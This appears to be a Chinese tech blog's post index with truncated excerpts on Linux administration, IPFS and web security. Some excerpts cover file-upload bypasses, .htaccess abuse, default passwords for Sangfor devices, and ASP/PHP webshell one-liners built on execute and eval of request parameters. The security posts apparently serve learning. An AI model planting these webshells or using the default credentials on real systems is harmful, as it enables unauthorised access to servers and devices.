原创 非插件實現Typecho語法高亮

具體的方法是通過prism.js而不是PHP代碼來實現語法高亮。直接百度找到prism.js的官網,進入下載頁面。在下載頁面中選中你想要實現語法高亮的語言。 下載js文件(prism.js)和css文件(prism.css) 將下載的

原创 第三週任務,利用文件上傳漏洞

0x00 前言 本週主要學習了文件上傳各種姿勢,掌握了常見的黑白名單後綴繞過、文件內容檢查繞過的原理、實現及簡單防護。 0X01 文件上傳校驗姿勢 o 客戶端javascript校驗(一般只校驗後綴名) o 服務端校驗 o 文件頭

原创 CentOS 下 tree命令用法詳解

當需要生成目錄樹結構時會用到TREE命令: yum install tree 關於TREE命令的一些參數: tree -a 顯示所有 tree -d 僅顯示目錄 tree -L n n代表數字..表示要顯示幾層… tree

原创 【IPFS指南】IPFS的競爭對手們(一)

IPFS這個項目真的開發很慢,相比其它區塊鏈項目,IPFS的進度可真是讓小編捉急,恨鐵不成鋼啊。然而小編仍然對他們充滿信心,來,借用一句盜夢空間裏的經典臺詞: 今天來講講現有的跟IPFS類似的區塊鏈項目,下面簡單介紹一下,其

原创 兩個好用的命令行工具 watch 和 rsync

watch有監控的需求,比如文件列表的變化等。 # -5 指的是間隔5s執行一次 # --differences 指高亮變化的地方 watch -n 5 --differences ls -l rsync不多說了,主要解決了我在服

原创 信安入門神級書單

《社會工程:安全體系中的人性漏洞》 《Android應用安全防護和逆向分析》 《逆向工程核心原理》 《Metasploit滲透測試魔鬼訓練營》 《鳥哥linux的私房菜》(第三版) 《Linux二進制分析》 《網絡空間

原创 常見網絡安全設備默認口令

[轉]安全設備常見網絡安全設備默認口令 設備 默認賬號 默認密碼 深信服產品 sangfor sangfor sangfor sangfor@2018 sangfor sangfor@2019 深信服

原创 【Shiro_exploit】PYTHON報錯解決:ModuleNotFoundError: No module named 'requests'

在復現Apache Shiro 漏洞時,發現自己的python環境各種報錯,值得注意的就是如下: Traceback (most recent call last): File "shiro_exploit.py", lin

原创 ctfhub 投稿彩蛋

flag[0:6] = ctfhub flag[6:12] = "{029e0" flag[12:18] = "2eb3a1" ZmxhZyU1QjE4JTNBMjQlNUQlMjAlM0QlMjAlMjJlOGM0OWIlMjI

原创 文件上傳漏洞之.htaccess

0x00 前言 .htaccess文件(“分佈式配置文件”)提供了針對目錄改變配置的方法, 即,在一個特定的文檔目錄中放置一個包含一個或多個指令的文件, 以作用於此目錄及其所有子目錄。作爲用戶,所能使用的命令將受到限制。管理員可以

原创 一句話##錯誤 'ASP 0116' 丟失腳本關閉分隔符

可以突破Script 塊缺少腳本關閉標記的一句話 asp一句話 <%execute(request(“NC”))%> "%><%execute(request(“NC”))%><%’ php一句話 <?php eval($_POS

原创 WDCP v3版本的小工具集

2的小工具集不再適合於v3的使用 v3版本的小工具集已經可以使用,如下說明 小工具從v3.0.1版本開始提供 修改/重置後臺用戶的密碼 /www/wdlinux/wdcp/shell/wdcploginchp.sh 適用於忘

原创 Windows server 2016 設置多用戶登陸

1.打組策略開始運行中輸入tsconfig.msc 2.計算機設置–管理模板–Windows組件–遠程桌面服務–連接–限制連接數–啓用並設置允許的DR最大數 3.設置完上面的發現還是不行;計算機設置–管理模板–Windows組

原创 CentOS 7 下掛載NTFS文件系統磁盤並設置開機自動掛載

1.下載之後進行解壓 wget http://tuxera.com/opensource/ntfs-3g_ntfsprogs-2014.2.15.tgz tar -xvf ntfs-3g_ntfsprogs-2014.2.1

原创 每天自動升級你的Centos

安裝 yum install yum-cron -y 配置 vim /etc/sysconfig/yum-cron 開啓服務 chkconfig yum-cron on or chkconfig --level 345